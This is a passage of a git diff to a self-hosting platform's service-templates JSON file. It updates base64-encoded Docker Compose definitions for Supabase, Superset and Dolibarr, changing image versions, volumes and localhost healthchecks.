BPUlQ+L2Z1bmN0aW9ucy92MS9oZWxsbycgXFxcbi8vICAgLS1oZWFkZXIgJ0F1dGhvcml6YXRpb246IEJlYXJlciA8YW5vbi9zZXJ2aWNlX3JvbGUgQVBJIGtleT4nXG4iCiAgICBjb21tYW5kOgogICAgICAtIHN0YXJ0CiAgICAgIC0gJy0tbWFpbi1zZXJ2aWNlJwogICAgICAtIC9ob21lL2Rlbm8vZnVuY3Rpb25zL21haW4KICBzdXBhYmFzZS1zdXBhdmlzb3I6CiAgICBpbWFnZTogJ3N1cGFiYXNlL3N1cGF2aXNvcjoyLjUuMScKICAgIGhlYWx0aGNoZWNrOgogICAgICB0ZXN0OgogICAgICAgIC0gQ01ECiAgICAgICAgLSBjdXJsCiAgICAgICAgLSAnLXNTZkwnCiAgICAgICAgLSAnLW8nCiAgICAgICAgLSAvZGV2L251bGwKICAgICAgICAtICdodHRwOi8vMTI3LjAuMC4xOjQwMDAvYXBpL2hlYWx0aCcKICAgICAgdGltZW91dDogNXMKICAgICAgaW50ZXJ2YWw6IDVzCiAgICAgIHJldHJpZXM6IDEwCiAgICBkZXBlbmRzX29uOgogICAgICBzdXBhYmFzZS1kYjoKICAgICAgICBjb25kaXRpb246IHNlcnZpY2VfaGVhbHRoeQogICAgICBzdXBhYmFzZS1hbmFseXRpY3M6CiAgICAgICAgY29uZGl0aW9uOiBzZXJ2aWNlX2hlYWx0aHkKICAgIGVudmlyb25tZW50OgogICAgICAtIFBPT0xFUl9URU5BTlRfSUQ9ZGV2X3RlbmFudAogICAgICAtIFBPT0xFUl9QT09MX01PREU9dHJhbnNhY3Rpb24KICAgICAgLSAnUE9PTEVSX0RFRkFVTFRfUE9PTF9TSVpFPSR7UE9PTEVSX0RFRkFVTFRfUE9PTF9TSVpFOi0yMH0nCiAgICAgIC0gJ1BPT0xFUl9NQVhfQ0xJRU5UX0NPTk49JHtQT09MRVJfTUFYX0NMSUVOVF9DT05OOi0xMDB9JwogICAgICAtIFBPUlQ9NDAwMAogICAgICAtICdQT1NUR1JFU19QT1JUPSR7UE9TVEdSRVNfUE9SVDotNTQzMn0nCiAgICAgIC0gJ1BPU1RHUkVTX0hPU1ROQU1FPSR7UE9TVEdSRVNfSE9TVE5BTUU6LXN1cGFiYXNlLWRifScKICAgICAgLSAnUE9TVEdSRVNfREI9JHtQT1NUR1JFU19EQjotcG9zdGdyZXN9JwogICAgICAtICdQT1NUR1JFU19QQVNTV09SRD0ke1NFUlZJQ0VfUEFTU1dPUkRfUE9TVEdSRVN9JwogICAgICAtICdEQVRBQkFTRV9VUkw9ZWN0bzovL3N1cGFiYXNlX2FkbWluOiR7U0VSVklDRV9QQVNTV09SRF9QT1NUR1JFU31AJHtQT1NUR1JFU19IT1NUTkFNRTotc3VwYWJhc2UtZGJ9OiR7UE9TVEdSRVNfUE9SVDotNTQzMn0vX3N1cGFiYXNlJwogICAgICAtIENMVVNURVJfUE9TVEdSRVM9dHJ1ZQogICAgICAtICdTRUNSRVRfS0VZX0JBU0U9JHtTRVJWSUNFX1BBU1NXT1JEX1NVUEFWSVNPUlNFQ1JFVH0nCiAgICAgIC0gJ1ZBVUxUX0VOQ19LRVk9JHtTRVJWSUNFX1BBU1NXT1JEX1ZBVUxURU5DfScKICAgICAgLSAnQVBJX0pXVF9TRUNSRVQ9JHtTRVJWSUNFX1BBU1NXT1JEX0pXVH0nCiAgICAgIC0gJ01FVFJJQ1NfSldUX1NFQ1JFVD0ke1NFUlZJQ0VfUEFTU1dPUkRfSldUfScKICAgICAgLSBSRUdJT049bG9jYWwKICAgICAgLSAnRVJMX0FGTEFHUz0tcHJvdG9fZGlzdCBpbmV0X3RjcCcKICAgIGNvbW1hbmQ6CiAgICAgIC0gL2Jpbi9zaAogICAgICAtICctYycKICAgICAgLSAnL2FwcC9iaW4vbWlncmF0ZSAmJiAvYXBwL2Jpbi9zdXBhdmlzb3IgZXZhbCAiJCQoY2F0IC9ldGMvcG9vbGVyL3Bvb2xlci5leHMpIiAmJiAvYXBwL2Jpbi9zZXJ2ZXInCiAgICB2b2x1bWVzOgogICAgICAtCiAgICAgICAgdHlwZTogYmluZAogICAgICAgIHNvdXJjZTogLi92b2x1bWVzL3Bvb2xlci9wb29sZXIuZXhzCiAgICAgICAgdGFyZ2V0OiAvZXRjL3Bvb2xlci9wb29sZXIuZXhzCiAgICAgICAgY29udGVudDogIns6b2ssIF99ID0gQXBwbGljYXRpb24uZW5zdXJlX2FsbF9zdGFydGVkKDpzdXBhdmlzb3IpXG57Om9rLCB2ZXJzaW9ufSA9XG4gICAgY2FzZSBTdXBhdmlzb3IuUmVwby5xdWVyeSEoXCJzZWxlY3QgdmVyc2lvbigpXCIpIGRvXG4gICAgJXtyb3dzOiBbW3Zlcl1dfSAtPiBTdXBhdmlzb3IuSGVscGVycy5wYXJzZV9wZ192ZXJzaW9uKHZlcilcbiAgICBfIC0+IG5pbFxuICAgIGVuZFxucGFyYW1zID0gJXtcbiAgICBcImV4dGVybmFsX2lkXCIgPT4gU3lzdGVtLmdldF9lbnYoXCJQT09MRVJfVEVOQU5UX0lEXCIpLFxuICAgIFwiZGJfaG9zdFwiID0+IFN5c3RlbS5nZXRfZW52KFwiUE9TVEdSRVNfSE9TVE5BTUVcIiksXG4gICAgXCJkYl9wb3J0XCIgPT4gU3lzdGVtLmdldF9lbnYoXCJQT1NUR1JFU19QT1JUXCIpIHw+IFN0cmluZy50b19pbnRlZ2VyKCksXG4gICAgXCJkYl9kYXRhYmFzZVwiID0+IFN5c3RlbS5nZXRfZW52KFwiUE9TVEdSRVNfREJcIiksXG4gICAgXCJyZXF1aXJlX3VzZXJcIiA9PiBmYWxzZSxcbiAgICBcImF1dGhfcXVlcnlcIiA9PiBcIlNFTEVDVCAqIEZST00gcGdib3VuY2VyLmdldF9hdXRoKCQxKVwiLFxuICAgIFwiZGVmYXVsdF9tYXhfY2xpZW50c1wiID0+IFN5c3RlbS5nZXRfZW52KFwiUE9PTEVSX01BWF9DTElFTlRfQ09OTlwiKSxcbiAgICBcImRlZmF1bHRfcG9vbF9zaXplXCIgPT4gU3lzdGVtLmdldF9lbnYoXCJQT09MRVJfREVGQVVMVF9QT09MX1NJWkVcIiksXG4gICAgXCJkZWZhdWx0X3BhcmFtZXRlcl9zdGF0dXNcIiA9PiAle1wic2VydmVyX3ZlcnNpb25cIiA9PiB2ZXJzaW9ufSxcbiAgICBcInVzZXJzXCIgPT4gWyV7XG4gICAgXCJkYl91c2VyXCIgPT4gXCJwZ2JvdW5jZXJcIixcbiAgICBcImRiX3Bhc3N3b3JkXCIgPT4gU3lzdGVtLmdldF9lbnYoXCJQT1NUR1JFU19QQVNTV09SRFwiKSxcbiAgICBcIm1vZGVfdHlwZVwiID0+IFN5c3RlbS5nZXRfZW52KFwiUE9PTEVSX1BPT0xfTU9ERVwiKSxcbiAgICBcInBvb2xfc2l6ZVwiID0+IFN5c3RlbS5nZXRfZW52KFwiUE9PTEVSX0RFRkFVTFRfUE9PTF9TSVpFXCIpLFxuICAgIFwiaXNfbWFuYWdlclwiID0+IHRydWVcbiAgICB9XVxufVxuXG50ZW5hbnQgPSBTdXBhdmlzb3IuVGVuYW50cy5nZXRfdGVuYW50X2J5X2V4dGVybmFsX2lkKHBhcmFtc1tcImV4dGVybmFsX2lkXCJdKVxuXG5pZiB0ZW5hbnQgZG9cbiAgezpvaywgX30gPSBTdXBhdmlzb3IuVGVuYW50cy51cGRhdGVfdGVuYW50KHRlbmFudCwgcGFyYW1zKVxuZWxzZVxuICB7Om9rLCBffSA9IFN1cGF2aXNvci5UZW5hbnRzLmNyZWF0ZV90ZW5hbnQocGFyYW1zKVxuZW5kXG4iCg==",
         "tags": [
             "firebase",
             "alternative",
@@ -4102,7 +4102,7 @@
     "superset-with-postgresql": {
         "documentation": "https://github.com/amancevice/docker-superset?utm_source=coolify.io",
         "slogan": "Modern data exploration and visualization platform (unofficial community docker image)",
-        "compose": "c2VydmljZXM6CiAgc3VwZXJzZXQ6CiAgICBpbWFnZTogJ2FtYW5jZXZpY2Uvc3VwZXJzZXQ6bGF0ZXN0JwogICAgZW52aXJvbm1lbnQ6CiAgICAgIC0gU0VSVklDRV9VUkxfU1VQRVJTRVRfODA4OAogICAgICAtICdTRUNSRVRfS0VZPSR7U0VSVklDRV9CQVNFNjRfNjRfU1VQRVJTRVRTRUNSRVRLRVl9JwogICAgICAtICdNQVBCT1hfQVBJX0tFWT0ke01BUEJPWF9BUElfS0VZfScKICAgICAgLSAnUE9TVEdSRVNfVVNFUj0ke1NFUlZJQ0VfVVNFUl9QT1NUR1JFU30nCiAgICAgIC0gJ1BPU1RHUkVTX1BBU1NXT1JEPSR7U0VSVklDRV9QQVNTV09SRF9QT1NUR1JFU30nCiAgICAgIC0gJ1BPU1RHUkVTX0RCPSR7UE9TVEdSRVNfREI6LXN1cGVyc2V0LWRifScKICAgICAgLSAnUkVESVNfUEFTU1dPUkQ9JHtTRVJWSUNFX1BBU1NXT1JEX1JFRElTfScKICAgIHZvbHVtZXM6CiAgICAgIC0KICAgICAgICB0eXBlOiBiaW5kCiAgICAgICAgc291cmNlOiAuL3N1cGVyc2V0L3N1cGVyc2V0X2NvbmZpZy5weQogICAgICAgIHRhcmdldDogL2V0Yy9zdXBlcnNldC9zdXBlcnNldF9jb25maWcucHkKICAgICAgICBjb250ZW50OiAiXCJcIlwiXG5Gb3IgbW9yZSBjb25maWd1cmF0aW9uIG9wdGlvbnMsIHNlZTpcbi0gaHR0cHM6Ly9zdXBlcnNldC5hcGFjaGUub3JnL2RvY3MvY29uZmlndXJhdGlvbi9jb25maWd1cmluZy1zdXBlcnNldFxuXCJcIlwiXG5cbmltcG9ydCBvc1xuXG5TRUNSRVRfS0VZID0gb3MuZ2V0ZW52KFwiU0VDUkVUX0tFWVwiKVxuTUFQQk9YX0FQSV9LRVkgPSBvcy5nZXRlbnYoXCJNQVBCT1hfQVBJX0tFWVwiLCBcIlwiKVxuXG5DQUNIRV9DT05GSUcgPSB7XG4gIFwiQ0FDSEVfVFlQRVwiOiBcIlJlZGlzQ2FjaGVcIixcbiAgXCJDQUNIRV9ERUZBVUxUX1RJTUVPVVRcIjogMzAwLFxuICBcIkNBQ0hFX0tFWV9QUkVGSVhcIjogXCJzdXBlcnNldF9cIixcbiAgXCJDQUNIRV9SRURJU19IT1NUXCI6IFwicmVkaXNcIixcbiAgXCJDQUNIRV9SRURJU19QT1JUXCI6IDYzNzksXG4gIFwiQ0FDSEVfUkVESVNfREJcIjogMSxcbiAgXCJDQUNIRV9SRURJU19VUkxcIjogZlwicmVkaXM6Ly86e29zLmdldGVudignUkVESVNfUEFTU1dPUkQnKX1AcmVkaXM6NjM3OS8xXCIsXG59XG5cbkZJTFRFUl9TVEFURV9DQUNIRV9DT05GSUcgPSB7KipDQUNIRV9DT05GSUcsIFwiQ0FDSEVfS0VZX1BSRUZJWFwiOiBcInN1cGVyc2V0X2ZpbHRlcl9cIn1cbkVYUExPUkVfRk9STV9EQVRBX0NBQ0hFX0NPTkZJRyA9IHsqKkNBQ0hFX0NPTkZJRywgXCJDQUNIRV9LRVlfUFJFRklYXCI6IFwic3VwZXJzZXRfZXhwbG9yZV9mb3JtX1wifVxuXG5TUUxBTENIRU1ZX1RSQUNLX01PRElGSUNBVElPTlMgPSBUcnVlXG5TUUxBTENIRU1ZX0RBVEFCQVNFX1VSSSA9IGZcInBvc3RncmVzcWwrcHN5Y29wZzI6Ly97b3MuZ2V0ZW52KCdQT1NUR1JFU19VU0VSJyl9Ontvcy5nZXRlbnYoJ1BPU1RHUkVTX1BBU1NXT1JEJyl9QHBvc3RncmVzOjU0MzIve29zLmdldGVudignUE9TVEdSRVNfREInKX1cIlxuXG4jIFVuY29tbWVudCBpZiB5b3Ugd2FudCB0byBsb2FkIGV4YW1wbGUgZGF0YSAodXNpbmcgXCJzdXBlcnNldCBsb2FkX2V4YW1wbGVzXCIpIGF0IHRoZVxuIyBzYW1lIGxvY2F0aW9uIGFzIHlvdXIgbWV0YWRhdGEgcG9zdGdyZXNxbCBpbnN0YW5jZS4gT3RoZXJ3aXNlLCB0aGUgZGVmYXVsdCBzcWxpdGVcbiMgd2lsbCBiZSB1c2VkLCB3aGljaCB3aWxsIG5vdCBwZXJzaXN0IGluIHZvbHVtZSB3aGVuIHJlc3RhcnRpbmcgc3VwZXJzZXQgYnkgZGVmYXVsdC5cbiNTUUxBTENIRU1ZX0VYQU1QTEVTX1VSSSA9IFNRTEFMQ0hFTVlfREFUQUJBU0VfVVJJIgogICAgZGVwZW5kc19vbjoKICAgICAgcG9zdGdyZXM6CiAgICAgICAgY29uZGl0aW9uOiBzZXJ2aWNlX2hlYWx0aHkKICAgICAgcmVkaXM6CiAgICAgICAgY29uZGl0aW9uOiBzZXJ2aWNlX2hlYWx0aHkKICAgIGhlYWx0aGNoZWNrOgogICAgICB0ZXN0OgogICAgICAgIC0gQ01ECiAgICAgICAgLSBjdXJsCiAgICAgICAgLSAnLWYnCiAgICAgICAgLSAnaHR0cDovLzEyNy4wLjAuMTo4MDg4L2hlYWx0aCcKICAgICAgaW50ZXJ2YWw6IDVzCiAgICAgIHRpbWVvdXQ6IDIwcwogICAgICByZXRyaWVzOiAxMAogIHBvc3RncmVzOgogICAgaW1hZ2U6ICdwb3N0Z3JlczoxNy1hbHBpbmUnCiAgICBlbnZpcm9ubWVudDoKICAgICAgLSAnUE9TVEdSRVNfVVNFUj0ke1NFUlZJQ0VfVVNFUl9QT1NUR1JFU30nCiAgICAgIC0gJ1BPU1RHUkVTX1BBU1NXT1JEPSR7U0VSVklDRV9QQVNTV09SRF9QT1NUR1JFU30nCiAgICAgIC0gJ1BPU1RHUkVTX0RCPSR7UE9TVEdSRVNfREI6LXN1cGVyc2V0LWRifScKICAgIHZvbHVtZXM6CiAgICAgIC0gJ3N1cGVyc2V0X3Bvc3RncmVzX2RhdGE6L3Zhci9saWIvcG9zdGdyZXNxbC9kYXRhJwogICAgaGVhbHRoY2hlY2s6CiAgICAgIHRlc3Q6CiAgICAgICAgLSBDTUQtU0hFTEwKICAgICAgICAtICdwZ19pc3JlYWR5IC1VICQke1BPU1RHUkVTX1VTRVJ9IC1kICQke1BPU1RHUkVTX0RCfScKICAgICAgaW50ZXJ2YWw6IDVzCiAgICAgIHRpbWVvdXQ6IDIwcwogICAgICByZXRyaWVzOiAxMAogIHJlZGlzOgogICAgaW1hZ2U6ICdyZWRpczo4LWFscGluZScKICAgIHZvbHVtZXM6CiAgICAgIC0gJ3N1cGVyc2V0X3JlZGlzX2RhdGE6L2RhdGEnCiAgICBjb21tYW5kOiAncmVkaXMtc2VydmVyIC0tcmVxdWlyZXBhc3MgJHtTRVJWSUNFX1BBU1NXT1JEX1JFRElTfScKICAgIGhlYWx0aGNoZWNrOgogICAgICB0ZXN0OiAncmVkaXMtY2xpIHBpbmcnCiAgICAgIGludGVydmFsOiA1cwogICAgICB0aW1lb3V0OiAyMHMKICAgICAgcmV0cmllczogMTAK",
+        "compose": "c2VydmljZXM6CiAgc3VwZXJzZXQ6CiAgICBpbWFnZTogJ2FtYW5jZXZpY2Uvc3VwZXJzZXQ6Ni4wLjAnCiAgICBlbnZpcm9ubWVudDoKICAgICAgLSBTRVJWSUNFX1VSTF9TVVBFUlNFVF84MDg4CiAgICAgIC0gJ1NFQ1JFVF9LRVk9JHtTRVJWSUNFX0JBU0U2NF82NF9TVVBFUlNFVFNFQ1JFVEtFWX0nCiAgICAgIC0gJ01BUEJPWF9BUElfS0VZPSR7TUFQQk9YX0FQSV9LRVl9JwogICAgICAtICdQT1NUR1JFU19VU0VSPSR7U0VSVklDRV9VU0VSX1BPU1RHUkVTfScKICAgICAgLSAnUE9TVEdSRVNfUEFTU1dPUkQ9JHtTRVJWSUNFX1BBU1NXT1JEX1BPU1RHUkVTfScKICAgICAgLSAnUE9TVEdSRVNfREI9JHtQT1NUR1JFU19EQjotc3VwZXJzZXQtZGJ9JwogICAgICAtICdSRURJU19QQVNTV09SRD0ke1NFUlZJQ0VfUEFTU1dPUkRfUkVESVN9JwogICAgdm9sdW1lczoKICAgICAgLQogICAgICAgIHR5cGU6IGJpbmQKICAgICAgICBzb3VyY2U6IC4vc3VwZXJzZXQvc3VwZXJzZXRfY29uZmlnLnB5CiAgICAgICAgdGFyZ2V0OiAvZXRjL3N1cGVyc2V0L3N1cGVyc2V0X2NvbmZpZy5weQogICAgICAgIGNvbnRlbnQ6ICJcIlwiXCJcbkZvciBtb3JlIGNvbmZpZ3VyYXRpb24gb3B0aW9ucywgc2VlOlxuLSBodHRwczovL3N1cGVyc2V0LmFwYWNoZS5vcmcvZG9jcy9jb25maWd1cmF0aW9uL2NvbmZpZ3VyaW5nLXN1cGVyc2V0XG5cIlwiXCJcblxuaW1wb3J0IG9zXG5cblNFQ1JFVF9LRVkgPSBvcy5nZXRlbnYoXCJTRUNSRVRfS0VZXCIpXG5NQVBCT1hfQVBJX0tFWSA9IG9zLmdldGVudihcIk1BUEJPWF9BUElfS0VZXCIsIFwiXCIpXG5cbkNBQ0hFX0NPTkZJRyA9IHtcbiAgXCJDQUNIRV9UWVBFXCI6IFwiUmVkaXNDYWNoZVwiLFxuICBcIkNBQ0hFX0RFRkFVTFRfVElNRU9VVFwiOiAzMDAsXG4gIFwiQ0FDSEVfS0VZX1BSRUZJWFwiOiBcInN1cGVyc2V0X1wiLFxuICBcIkNBQ0hFX1JFRElTX0hPU1RcIjogXCJyZWRpc1wiLFxuICBcIkNBQ0hFX1JFRElTX1BPUlRcIjogNjM3OSxcbiAgXCJDQUNIRV9SRURJU19EQlwiOiAxLFxuICBcIkNBQ0hFX1JFRElTX1VSTFwiOiBmXCJyZWRpczovLzp7b3MuZ2V0ZW52KCdSRURJU19QQVNTV09SRCcpfUByZWRpczo2Mzc5LzFcIixcbn1cblxuRklMVEVSX1NUQVRFX0NBQ0hFX0NPTkZJRyA9IHsqKkNBQ0hFX0NPTkZJRywgXCJDQUNIRV9LRVlfUFJFRklYXCI6IFwic3VwZXJzZXRfZmlsdGVyX1wifVxuRVhQTE9SRV9GT1JNX0RBVEFfQ0FDSEVfQ09ORklHID0geyoqQ0FDSEVfQ09ORklHLCBcIkNBQ0hFX0tFWV9QUkVGSVhcIjogXCJzdXBlcnNldF9leHBsb3JlX2Zvcm1fXCJ9XG5cblNRTEFMQ0hFTVlfVFJBQ0tfTU9ESUZJQ0FUSU9OUyA9IFRydWVcblNRTEFMQ0hFTVlfREFUQUJBU0VfVVJJID0gZlwicG9zdGdyZXNxbCtwc3ljb3BnMjovL3tvcy5nZXRlbnYoJ1BPU1RHUkVTX1VTRVInKX06e29zLmdldGVudignUE9TVEdSRVNfUEFTU1dPUkQnKX1AcG9zdGdyZXM6NTQzMi97b3MuZ2V0ZW52KCdQT1NUR1JFU19EQicpfVwiXG5cbiMgVW5jb21tZW50IGlmIHlvdSB3YW50IHRvIGxvYWQgZXhhbXBsZSBkYXRhICh1c2luZyBcInN1cGVyc2V0IGxvYWRfZXhhbXBsZXNcIikgYXQgdGhlXG4jIHNhbWUgbG9jYXRpb24gYXMgeW91ciBtZXRhZGF0YSBwb3N0Z3Jlc3FsIGluc3RhbmNlLiBPdGhlcndpc2UsIHRoZSBkZWZhdWx0IHNxbGl0ZVxuIyB3aWxsIGJlIHVzZWQsIHdoaWNoIHdpbGwgbm90IHBlcnNpc3QgaW4gdm9sdW1lIHdoZW4gcmVzdGFydGluZyBzdXBlcnNldCBieSBkZWZhdWx0LlxuI1NRTEFMQ0hFTVlfRVhBTVBMRVNfVVJJID0gU1FMQUxDSEVNWV9EQVRBQkFTRV9VUkkiCiAgICBkZXBlbmRzX29uOgogICAgICBwb3N0Z3JlczoKICAgICAgICBjb25kaXRpb246IHNlcnZpY2VfaGVhbHRoeQogICAgICByZWRpczoKICAgICAgICBjb25kaXRpb246IHNlcnZpY2VfaGVhbHRoeQogICAgaGVhbHRoY2hlY2s6CiAgICAgIHRlc3Q6CiAgICAgICAgLSBDTUQKICAgICAgICAtIGN1cmwKICAgICAgICAtICctZicKICAgICAgICAtICdodHRwOi8vMTI3LjAuMC4xOjgwODgvaGVhbHRoJwogICAgICBpbnRlcnZhbDogNXMKICAgICAgdGltZW91dDogMjBzCiAgICAgIHJldHJpZXM6IDEwCiAgcG9zdGdyZXM6CiAgICBpbWFnZTogJ3Bvc3RncmVzOjE4JwogICAgZW52aXJvbm1lbnQ6CiAgICAgIC0gJ1BPU1RHUkVTX1VTRVI9JHtTRVJWSUNFX1VTRVJfUE9TVEdSRVN9JwogICAgICAtICdQT1NUR1JFU19QQVNTV09SRD0ke1NFUlZJQ0VfUEFTU1dPUkRfUE9TVEdSRVN9JwogICAgICAtICdQT1NUR1JFU19EQj0ke1BPU1RHUkVTX0RCOi1zdXBlcnNldC1kYn0nCiAgICB2b2x1bWVzOgogICAgICAtICdzdXBlcnNldF9wb3N0Z3Jlc19kYXRhOi92YXIvbGliL3Bvc3RncmVzcWwnCiAgICBoZWFsdGhjaGVjazoKICAgICAgdGVzdDoKICAgICAgICAtIENNRC1TSEVMTAogICAgICAgIC0gJ3BnX2lzcmVhZHkgLVUgJCR7UE9TVEdSRVNfVVNFUn0gLWQgJCR7UE9TVEdSRVNfREJ9JwogICAgICBpbnRlcnZhbDogNXMKICAgICAgdGltZW91dDogMjBzCiAgICAgIHJldHJpZXM6IDEwCiAgcmVkaXM6CiAgICBpbWFnZTogJ3JlZGlzOjgnCiAgICB2b2x1bWVzOgogICAgICAtICdzdXBlcnNldF9yZWRpc19kYXRhOi9kYXRhJwogICAgY29tbWFuZDogJ3JlZGlzLXNlcnZlciAtLXJlcXVpcmVwYXNzICR7U0VSVklDRV9QQVNTV09SRF9SRURJU30nCiAgICBoZWFsdGhjaGVjazoKICAgICAgdGVzdDogJ3JlZGlzLWNsaSBwaW5nJwogICAgICBpbnRlcnZhbDogNXMKICAgICAgdGltZW91dDogMjBzCiAgICAgIHJldHJpZXM6IDEwCg==",
         "tags": [
             "analytics",
             "bi",
diff --git a/templates/service-templates.json b/templates/service-templates.json
index aae653dac..ccd00c04c 100644
--- a/templates/service-templates.json
+++ b/templates/service-templates.json
@@ -851,7 +851,7 @@
     "dolibarr": {
         "documentation": "https://www.dolibarr.org/documentation-home.php?utm_source=coolify.io",
         "slogan": "Dolibarr is a modern software package to manage your organization's activity (contacts, quotes, invoices, orders, stocks, agenda, hr, expense reports, accountancy, ecm, manufacturing, ...).",
-        "compose": "c2VydmljZXM6CiAgZG9saWJhcnI6CiAgICBpbWFnZTogJ2RvbGliYXJyL2RvbGliYXJyOmxhdGVzdCcKICAgIGVudmlyb25tZW50OgogICAgICAtIFNFUlZJQ0VfRlFETl9ET0xJQkFSUl84MAogICAgICAtICdXV1dfVVNFUl9JRD0ke1dXV19VU0VSX0lEOi0xMDAwfScKICAgICAgLSAnV1dXX0dST1VQX0lEPSR7V1dXX0dST1VQX0lEOi0xMDAwfScKICAgICAgLSBET0xJX0RCX0hPU1Q9bWFyaWFkYgogICAgICAtICdET0xJX0RCX05BTUU9JHtNWVNRTF9EQVRBQkFTRTotZG9saWJhcnItZGJ9JwogICAgICAtICdET0xJX0RCX1VTRVI9JHtTRVJWSUNFX1VTRVJfTVlTUUx9JwogICAgICAtICdET0xJX0RCX1BBU1NXT1JEPSR7U0VSVklDRV9QQVNTV09SRF9NWVNRTH0nCiAgICAgIC0gJ0RPTElfVVJMX1JPT1Q9JHtTRVJWSUNFX0ZRRE5fRE9MSUJBUlJ9JwogICAgICAtICdET0xJX0FETUlOX0xPR0lOPSR7U0VSVklDRV9VU0VSX0RPTElCQVJSfScKICAgICAgLSAnRE9MSV9BRE1JTl9QQVNTV09SRD0ke1NFUlZJQ0VfUEFTU1dPUkRfRE9MSUJBUlJ9JwogICAgICAtICdET0xJX0NST049JHtET0xJX0NST046LTB9JwogICAgICAtICdET0xJX0lOSVRfREVNTz0ke0RPTElfSU5JVF9ERU1POi0wfScKICAgICAgLSAnRE9MSV9DT01QQU5ZX05BTUU9JHtET0xJX0NPTVBBTllfTkFNRTotTXlCaWdDb21wYW55fScKICAgIGhlYWx0aGNoZWNrOgogICAgICB0ZXN0OgogICAgICAgIC0gQ01ECiAgICAgICAgLSBjdXJsCiAgICAgICAgLSAnLWYnCiAgICAgICAgLSAnaHR0cDovLzEyNy4wLjAuMTo4MCcKICAgICAgaW50ZXJ2YWw6IDJzCiAgICAgIHRpbWVvdXQ6IDEwcwogICAgICByZXRyaWVzOiAxNQogIG1hcmlhZGI6CiAgICBpbWFnZTogJ21hcmlhZGI6bGF0ZXN0JwogICAgZW52aXJvbm1lbnQ6CiAgICAgIC0gJ01ZU1FMX0RBVEFCQVNFPSR7TVlTUUxfREFUQUJBU0U6LWRvbGliYXJyLWRifScKICAgICAgLSAnTVlTUUxfVVNFUj0ke1NFUlZJQ0VfVVNFUl9NWVNRTH0nCiAgICAgIC0gJ01ZU1FMX1BBU1NXT1JEPSR7U0VSVklDRV9QQVNTV09SRF9NWVNRTH0nCiAgICAgIC0gJ01ZU1FMX1JPT1RfUEFTU1dPUkQ9JHtTRVJWSUNFX1BBU1NXT1JEX1JPT1R9JwogICAgdm9sdW1lczoKICAgICAgLSAnZG9saWJhcnJfbWFyaWFkYl9kYXRhOi92YXIvbGliL215c3FsJwogICAgaGVhbHRoY2hlY2s6CiAgICAgIHRlc3Q6CiAgICAgICAgLSBDTUQKICAgICAgICAtIGhlYWx0aGNoZWNrLnNoCiAgICAgICAgLSAnLS1jb25uZWN0JwogICAgICAgIC0gJy0taW5ub2RiX2luaXRpYWxpemVkJwogICAgICBpbnRlcnZhbDogNXMKICAgICAgdGltZW91dDogMjBzCiAgICAgIHJldHJpZXM6IDEwCg==",
+        "compose": "c2VydmljZXM6CiAgZG9saWJhcnI6CiAgICBpbWFnZTogJ2RvbGliYXJyL2RvbGliYXJyOmxhdGVzdCcKICAgIGVudmlyb25tZW50OgogICAgICAtIFNFUlZJQ0VfRlFETl9ET0xJQkFSUl84MAogICAgICAtICdXV1dfVVNFUl9JRD0ke1dXV19VU0VSX0lEOi0xMDAwfScKICAgICAgLSAnV1dXX0dST1VQX0lEPSR7V1dXX0dST1VQX0lEOi0xMDAwfScKICAgICAgLSBET0xJX0RCX0hPU1Q9bWFyaWFkYgogICAgICAtICdET0xJX0RCX05BTUU9JHtNWVNRTF9EQVRBQkFTRTotZG9saWJhcnItZGJ9JwogICAgICAtICdET0xJX0RCX1VTRVI9JHtTRVJWSUNFX1VTRVJfTVlTUUx9JwogICAgICAtICdET0xJX0RCX1BBU1NXT1JEPSR7U0VSVklDRV9QQVNTV09SRF9NWVNRTH0nCiAgICAgIC0gJ0RPTElfVVJMX1JPT1Q9JHtTRVJWSUNFX0ZRRE5fRE9MSUJBUlJ9JwogICAgICAtICdET0xJX0FETUlOX0xPR0lOPSR7U0VSVklDRV9VU0VSX0RPTElCQVJSfScKICAgICAgLSAnRE9MSV9BRE1JTl9QQVNTV09SRD0ke1NFUlZJQ0VfUEFTU1dPUkRfRE9MSUJBUlJ9JwogICAgICAtICdET0xJX0NST049JHtET0xJX0NST046LTB9JwogICAgICAtICdET0xJX0lOSVRfREVNTz0ke0RPTElfSU5JVF9ERU1POi0wfScKICAgICAgLSAnRE9MSV9DT01QQU5ZX05BTUU9JHtET0xJX0NPTVBBTllfTkFNRTotTXlCaWdDb21wYW55fScKICAgIHZvbHVtZXM6CiAgICAgIC0gJ2RvbGliYXJyX2RvY3M6L3Zhci93d3cvZG9jdW1lbnRzJwogICAgICAtICdkb2xpYmFycl9jdXN0b206L3Zhci93d3cvaHRtbC9jdXN0b20nCiAgICBoZWFsdGhjaGVjazoKICAgICAgdGVzdDoKICAgICAgICAtIENNRAogICAgICAgIC0gY3VybAogICAgICAgIC0gJy1mJwogICAgICAgIC0gJ2h0dHA6Ly8xMjcuMC4wLjE6ODAnCiAgICAgIGludGVydmFsOiAycwogICAgICB0aW1lb3V0OiAxMHMKICAgICAgcmV0cmllczogMTUKICBtYXJpYWRiOgogICAgaW1hZ2U6ICdtYXJpYWRiOmxhdGVzdCcKICAgIGVudmlyb25tZW50OgogICAgICAtICdNWVNRTF9EQVRBQkFTRT0ke01ZU1FMX0RBVEFCQVNFOi1kb2xpYmFyci1kYn0nCiAgICAgIC0gJ01ZU1FMX1VTRVI9JHtTRVJWSUNFX1VTRVJfTVlTUUx9JwogICAgICAtICdNWVNRTF9QQVNTV09SRD0ke1NFUlZJQ0VfUEFTU1dPUkRfTVlTUUx9JwogICAgICAtICdNWVNRTF9ST09UX1BBU1NXT1JEPSR7U0VSVklDRV9QQVNTV09SRF9ST09UfScKICAgIHZvbHVtZXM6CiAgICAgIC0gJ2RvbGliYXJyX21hcmlhZGJfZGF0YTovdmFyL2xpYi9teXNxbCcKICAgIGhlYWx0aGNoZWNrOgogICAgICB0ZXN0OgogICAgICAgIC0gQ01ECiAgICAgICAgLSBoZWFsdGhjaGVjay5zaAogICAgICAgIC0gJy0tY29ubmVjdCcKICAgICAgICAtICctLWlubm9kYl9pbml0aWFsaXplZCcKICAgICAgaW50ZXJ2YWw6IDVzCiAgICAgIHRpbWVvdXQ6IDIwcwogICAgICByZXRyaWVzOiAxMAo=",
         "tags": [
             "crm",
             "erp"
@@ -4088,7 +4088,7 @@
     "supabase": {
         "documentation": "https://supabase.io?utm_source=coolify.io",
         "slogan": "The open source Firebase alternative.",
